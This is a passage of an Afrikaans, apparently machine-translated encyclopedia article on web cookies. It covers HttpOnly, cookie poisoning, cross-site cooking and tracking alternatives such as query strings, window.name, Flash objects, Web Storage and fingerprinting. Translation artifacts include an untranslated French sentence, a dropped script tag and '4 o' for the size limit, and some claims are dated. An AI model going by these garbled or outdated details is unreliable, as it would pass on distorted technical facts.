Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Wanneer die blaaier so 'n koekie ontvang, is dit veronderstel om dit normaalweg in die volgende HTTP-uitruiling te gebruik, maar sonder om dit sigbaar te maak vir skrifte wat aan die kliëntkant uitgevoer word. Die HttpOnly-vlag is nie deel van enige amptelike tegniese spesifikasie nie, en word nie in alle blaaiers geïmplementeer nie. Let daarop dat daar tans geen manier is om die lees en skryf van sessiekoekies deur die XMLHTTPRequest-metode te verhoed nie.

Wysiging van inhoud: 'n aanvaller stuur 'n ongeldige koekie na 'n bediener, moontlik gemaak van 'n geldige koekie wat deur die bediener gestuur is.

Verander koekies

Sodra die koekies gestoor en onveranderd na die bediener teruggestuur moet word, kan 'n aanvaller die waarde van die koekies wysig voordat dit na die bediener teruggestuur word. Byvoorbeeld, as 'n koekie die totale waarde bevat wat die gebruiker moet betaal vir die items wat in die winkel se inkopiemandjie geplaas word, stel die verandering van hierdie waarde die bediener bloot aan die risiko om die aanvaller minder as die beginprys te hef. Die proses om die waarde van koekies te wysig word genoem koekie vergiftiging en kan na koekiediefstal gebruik word om die aanval aanhoudend te maak.

In die koekie-oorheersingsmetode gebruik die aanvaller 'n blaaierfout om 'n ongeldige koekie na die bediener te stuur.

Die meeste webwerwe stoor egter net 'n sessie-ID - 'n lukraak gegenereerde unieke nommer wat gebruik word om die sessiegebruiker te identifiseer - in die koekie self, terwyl alle ander inligting op die bediener gestoor word. In hierdie geval is hierdie probleem grootliks opgelos.

Koekiehantering tussen webwerwe

Daar word van elke webwerf verwag om sy eie webkoekies te hê, so een webwerf behoort nie koekies wat met 'n ander webwerf geassosieer word te kan verander of skep nie. 'n Sekuriteitsfout van 'n webblaaier kan kwaadwillige werwe toelaat om hierdie reël te oortree. Die uitbuiting van so 'n gebrek word algemeen na verwys as kruis-terrein kook. Die doel van sulke aanvalle kan sessie-ID-diefstal wees.

Gebruikers moet die nuutste weergawes van webblaaiers gebruik waarin hierdie kwesbaarhede feitlik uitgeskakel is.

Botsende toestand tussen kliënt en bediener

Die gebruik van koekies kan 'n teenstrydigheid genereer tussen die toestand van die kliënt en die toestand wat in die koekie gestoor is. As die gebruiker 'n koekie verkry en op die "Terug"-knoppie van die blaaier klik, is die toestand van die blaaier oor die algemeen nie dieselfde as voor hierdie verkryging nie. Byvoorbeeld, as die mandjie van 'n aanlyn winkel met behulp van koekies geskep word, kan die inhoud van die mandjie nie verander wanneer die gebruiker terugkeer na die blaaiergeskiedenis nie: as die gebruiker 'n knoppie druk om 'n artikel in sy mandjie te voeg en op die "Terug" klik "-knoppie, die artikel bly in hierdie een. Dit is dalk nie die bedoeling van die gebruiker nie, wat beslis die byvoeging van die artikel wil kanselleer. Dit kan lei tot onbetroubaarheid, verwarring en foute. Webontwikkelaars moet dus bewus wees van hierdie probleem en maatreëls implementeer om situasies soos hierdie te hanteer.

Koekie verval

Aanhoudende koekies is gekritiseer deur privaatheidsekuriteitskenners omdat hulle nie gestel is om gou genoeg te verval nie, en sodoende webwerwe in staat stel om gebruikers op te spoor en hul profiel mettertyd te bou. Hierdie aspek van koekies is ook deel van die sessiekapingsprobleem, want 'n gesteelde aanhoudende koekie kan gebruik word om 'n gebruiker vir 'n aansienlike tydperk na te doen.

Om ook te lees: GAFAM: wie is hulle? Hoekom is hulle (soms) so skrikwekkend?

Alternatiewe vir koekies

Sommige bewerkings wat met koekies uitgevoer kan word, kan ook uitgevoer word met ander meganismes wat koekies omseil of geskrap koekies herskep, wat privaatheidskwessies op dieselfde manier skep (of soms erger omdat dit dan onsigbaar is) as koekies.

IP-adres

Gebruikers kan opgespoor word met die IP-adres van die rekenaar wat die bladsy bel. Hierdie tegniek is beskikbaar sedert die bekendstelling van die Wêreldwye Web, aangesien bladsye afgelaai word, versoek die bediener die IP-adres van die rekenaar wat die blaaier of instaanbediener gebruik, indien nie een gebruik word nie. Die bediener kan hierdie inligting opspoor of daar koekies in gebruik is of nie. Hierdie adresse is egter tipies minder betroubaar in die identifisering van 'n gebruiker as koekies omdat rekenaars en gevolmagtigdes deur verskeie gebruikers gedeel kan word, en dieselfde rekenaar kan 'n ander IP-adres op elke werksessie ontvang (soos c dikwels die geval vir telefoonverbindings) .

Nasporing deur IP-adresse kan in sommige situasies betroubaar wees, soos breëbandverbindings wat dieselfde IP-adres vir 'n lang tyd behou, solank die krag aan is.

Sommige stelsels soos Tor is ontwerp om die anonimiteit van die internet te handhaaf en om opsporing deur IP-adres onmoontlik of onprakties te maak.

URL

'n Meer presiese tegniek is gebaseer op die inbedding van inligting in URL's. Die navraagstring-deel van die URL is een tegniek wat tipies vir hierdie doel gebruik word, maar ander dele kan ook gebruik word. Beide die Java-bedienerlet en die PHP-sessiemeganismes gebruik hierdie metode as koekies nie geaktiveer is nie.

Hierdie metode behels dat die webbediener stringversoeke by die skakels van die webblad wat dit dra, byvoeg wanneer dit na die blaaier gestuur word. Wanneer die gebruiker 'n skakel volg, stuur die blaaier die aangehegte navraagstring terug na die bediener.

Navraagstringe wat vir hierdie doel gebruik word en koekies is baie soortgelyk, beide is inligting wat arbitrêr deur die bediener gekies is en deur die blaaier teruggestuur word. Daar is egter 'n paar verskille: wanneer 'n URL wat 'n navraagstring bevat, hergebruik word, word dieselfde inligting na die bediener gestuur. Byvoorbeeld, as 'n gebruiker se voorkeure in 'n navraagstring van 'n URL geënkodeer is, en die gebruiker stuur daardie URL na 'n ander gebruiker per e-pos, sal daardie gebruiker ook daardie voorkeure kan gebruik.

Aan die ander kant, wanneer 'n gebruiker twee keer toegang tot dieselfde bladsy verkry, is daar geen waarborg dat dieselfde navraagstring beide kere gebruik sal word nie. Byvoorbeeld, as 'n gebruiker die eerste keer op 'n bladsy van 'n interne werfbladsy beland en die tweede keer op dieselfde bladsy van 'n eksterne bladsy beland, is die navraagstring relatief tot die werfbladsy tipies anders, terwyl die webkoekies dieselfde is .

Ander nadele van navraagstringe hou verband met sekuriteit: om data wat 'n sessie identifiseer in navraagstringe te hou, aktiveer of vereenvoudig sessiefiksasie-aanvalle, identifiseerderverwysingsaanvalle en ander misbruike. Om sessie-ID's as HTTP-koekies deur te gee, is veiliger.

Versteekte vormveld

Een vorm van sessieopsporing, wat deur ASP.NET gebruik word, is om webvorms met versteekte velde te gebruik. Hierdie tegniek is baie soortgelyk aan die gebruik van URL-navraagstringe om inligting te dra en het dieselfde voordele en nadele; en as die vorm met die HTTP GET-metode verwerk word, word die velde eintlik deel van die URL van die blaaier wat dit sal stuur wanneer die vorm ingedien word. Maar die meeste vorms word met HTTP POST verwerk, wat veroorsaak dat die vorminligting, insluitend versteekte velde, bygevoeg word as 'n bykomende invoer wat nie deel van die URL of 'n koekie is nie.

Hierdie benadering het twee voordele vanuit 'n opsporingsperspektief: eerstens, die naspoor van die inligting wat in die HTML-bronkode en POST-invoer geplaas is eerder as die URL sal die gemiddelde gebruiker toelaat om hierdie dop te vermy; tweedens word die sessie-inligting nie gekopieer wanneer die gebruiker die URL kopieer nie (om byvoorbeeld die bladsy op skyf te stoor of per e-pos te stuur).

venster.naam

Alle algemene webblaaiers kan nogal 'n groot hoeveelheid data (2MB tot 32MB) via JavaScript stoor deur die DOM se window.name-eienskap te gebruik. Hierdie data kan in plaas van sessiekoekies gebruik word en word ook oor domeine heen gebruik. Die tegniek kan met JSON-voorwerpe gekoppel word om 'n komplekse stel sessieveranderlikes aan die kant van die kliënt te stoor.

Die nadeel is dat elke aparte venster of oortjie aanvanklik 'n leë venster.naam sal hê; wanneer u deur oortjies blaai (deur die gebruiker oopgemaak) beteken dit dat die oortjies wat individueel oopgemaak word nie 'n vensternaam sal hê nie. Verder kan window.name gebruik word om besoekers oor verskillende werwe op te spoor wat 'n privaatheidskwessie kan veroorsaak.

In sommige opsigte kan dit veiliger wees as koekies, as gevolg van die nie-betrokkenheid van die bediener, wat dit dus onkwesbaar maak vir die netwerkaanval van snuffelkoekies. As spesiale maatreëls egter getref word om die data te beskerm, is dit kwesbaar vir verdere aanvalle, aangesien die data beskikbaar is deur ander werwe wat in dieselfde venster oopgemaak is.

HTTP-verifikasie

Die HTTP-protokol sluit die basiese toegangstawingsprotokolle en die toegangstawingsamevatting in, wat toegang tot 'n webblad slegs toelaat wanneer die gebruiker die gebruikersnaam en wagwoord gegee het. As die bediener 'n sertifikaat versoek om toegang tot 'n webblad te verleen, versoek die blaaier dit van die gebruiker en sodra dit verkry is, stoor die blaaier dit en stuur dit in alle daaropvolgende HTTP-versoeke. Hierdie inligting kan gebruik word om die gebruiker op te spoor.

Plaaslike gedeelde voorwerp

As 'n blaaier die Adobe Flash Player-inprop insluit, sal die plaaslike gedeelde voorwerpe kan vir dieselfde doel as koekies gebruik word. Dit kan 'n aantreklike keuse vir webontwikkelaars wees omdat:

• die verstekgroottelimiet vir 'n plaaslike gedeelde voorwerp is 100 KB;
• sekuriteitskontroles is apart van gebruikerkoekiekontroles (sodat plaaslike gedeelde voorwerpe toegelaat kan word wanneer koekies nie is nie).

Hierdie laaste punt, wat die koekiebestuurbeleid van dié van Adobe se plaaslike gedeelde voorwerpe onderskei vrae laat ontstaan rakende die bestuur deur die gebruiker van sy privaatheidinstellings: hy moet bewus wees dat sy bestuur van koekies geen impak het op die bestuur van plaaslike gedeelde voorwerpe nie, en omgekeerd.

Nog 'n kritiek op hierdie stelsel is dat dit slegs gebruik kan word deur die Adobe Flash Player-inprop wat eie is en nie 'n webstandaard nie.

Kliënt-kant volharding

Sommige webblaaiers ondersteun 'n skrif-gebaseerde volhardingsmeganisme, wat die bladsy toelaat om inligting plaaslik te stoor vir latere gebruik. Internet Explorer ondersteun byvoorbeeld volgehoue ​​inligting in blaaiergeskiedenis, boekmerke, in 'n formaat wat in XML gestoor is, of direk met 'n webbladsy wat op skyf gestoor is. Vir Microsoft Internet Explorer 5 is daar 'n gebruikerdatametode beskikbaar deur DHTML-gedrag.

Die W3C het in HTML 5 'n nuwe JavaScript API vir kliënt-kant databerging genaamd Webberging bekendgestel en daarop gemik om webkoekies permanent te vervang. Dit is soortgelyk aan koekies, maar met aansienlik verbeterde kapasiteit en sonder om inligting in die kop van HTTP-versoeke te stoor. Die API laat twee tipes webberging toe: plaaslike berging en sessieberging, soortgelyk aan aanhoudende koekies en sessiekoekies (behalwe dat sessiekoekies verval wanneer die blaaier gesluit word terwyl sessieberging verval wanneer die oortjie gesluit is), onderskeidelik. Webberging word ondersteun deur Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 en Opera 10.50.

'n Ander meganisme maak gewoonlik staat op blaaierkas (in die geheue eerder as om te verfris) deur JavaScript-programme in webblaaie te gebruik. 

Byvoorbeeld, 'n bladsy kan die merker bevat . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Op hierdie stadium bly die program in die kasgeheue en die besoekte bladsy word nie 'n tweede keer herlaai nie. Gevolglik, as die program 'n globale veranderlike bevat (byvoorbeeld var id = 3243242;), bly hierdie identifiseerder geldig en kan dit deur ander JavaScript-kode ontgin word sodra die bladsy weer gelaai is, of sodra 'n bladsy wat die program koppel, gelaai is. 

Die grootste nadeel van hierdie metode is dat die JavaScript globale veranderlike staties moet wees, wat beteken dat dit nie soos 'n koekie verander of uitgevee kan word nie.

webblaaier vingerafdruk

'n Blaaier-vingerafdruk is inligting wat ingesamel word oor die konfigurasie-instellings van 'n blaaier vir identifikasiedoeleindes. Hierdie vingerafdrukke kan gebruik word om 'n internetgebruiker of 'n toestel ten volle of gedeeltelik te identifiseer, selfs wanneer koekies gedeaktiveer is.

Basiese webblaaierkonfigurasie-inligting is lank reeds deur webwerfgehoordienste ingesamel met die doel om menslike webverkeer akkuraat te meet en verskeie vorme van klikbedrog op te spoor. Met die hulp van skriftale aan die kliëntkant is die insameling van inligting baie meer akkurate nou moontlik.

Die omskakeling van hierdie inligting in 'n bietjie string produseer 'n toestel vingerafdruk. In 2010 het die Electronic Frontier Foundation (EFF) die entropie van 'n blaaier se vingerafdruk gemeet as ten minste 18,1 stukkies, en dit was voordat vooruitgang in doekvingerafdrukke 5,7 bisse by daardie entropie gevoeg het.

Koekies in 'n neutedop

Koekies is klein tekslêers wat deur die webblaaier op 'n webwerfbesoeker se hardeskyf gestoor word en wat (onder andere) gebruik word om inligting oor die besoeker of hul reis deur die webwerf aan te teken. Die webmeester kan dus die gewoontes van 'n besoeker herken en die aanbieding van sy webwerf vir elke besoeker verpersoonlik; koekies maak dit dan moontlik om te onthou hoeveel artikels om op die tuisblad te vertoon of selfs om die aanmeldbewyse vir enige private party te behou: wanneer die besoeker na die webwerf terugkeer, is dit nie meer nodig vir hom om sy naam en wagwoord in te tik om herken word, aangesien dit outomaties in die koekie gelees word.

'n Koekie het 'n beperkte lewensduur, gestel deur die werfontwerper. Hulle kan ook verval aan die einde van die sessie op die webwerf, wat ooreenstem met die sluiting van die blaaier. Koekies word wyd gebruik om die lewe vir besoekers makliker te maak en meer relevante inligting aan hulle te bied. Maar spesiale tegnieke maak dit moontlik om 'n besoeker op verskeie webwerwe te volg en sodoende baie uitgebreide inligting oor sy gewoontes in te samel en te kruiskontroleer. Hierdie metode het die gebruik van koekies 'n reputasie gegee as 'n toesigtegniek wat die privaatheid van besoekers skend, wat ongelukkig ooreenstem met die werklikheid in baie gevalle van gebruik om nie-tegniese redes of nie met respek vir gebruikersverwagtinge nie.

In reaksie op hierdie wettige vrese stel HTML 5 'n nuwe JavaScript API vir databerging aan die kliëntkant bekend, genaamd Webberging, wat baie veiliger en met groter kapasiteit is, wat daarop gemik is om koekies te vervang.

Berging van koekies

Met sommige blaaiers is 'n koekie maklik redigeerbaar, 'n eenvoudige teksredigeerder soos Notepad is genoeg om sy waardes handmatig te verander.

Koekies word verskillend gestoor afhangende van die blaaier:

• Microsoft Internet Explorer stoor elke koekie in 'n ander lêer;
• Mozilla Firefox stoor al sy koekies in 'n enkele lêer;
• Opera stoor al sy koekies in 'n enkele lêer en enkripteer dit (onmoontlik om dit te verander behalwe in die sagteware-opsies);
• Apple Safari stoor al sy koekies in 'n enkele .plist-uitbreidinglêer. Verandering is moontlik, maar nie baie maklik nie, tensy jy deur die sagteware-opsies gaan.

Blaaiers word vereis om te ondersteun 'n minima :

• 300 gelyktydige koekies;
• 4 o per koekie;
• 20 koekies per gasheer of domein.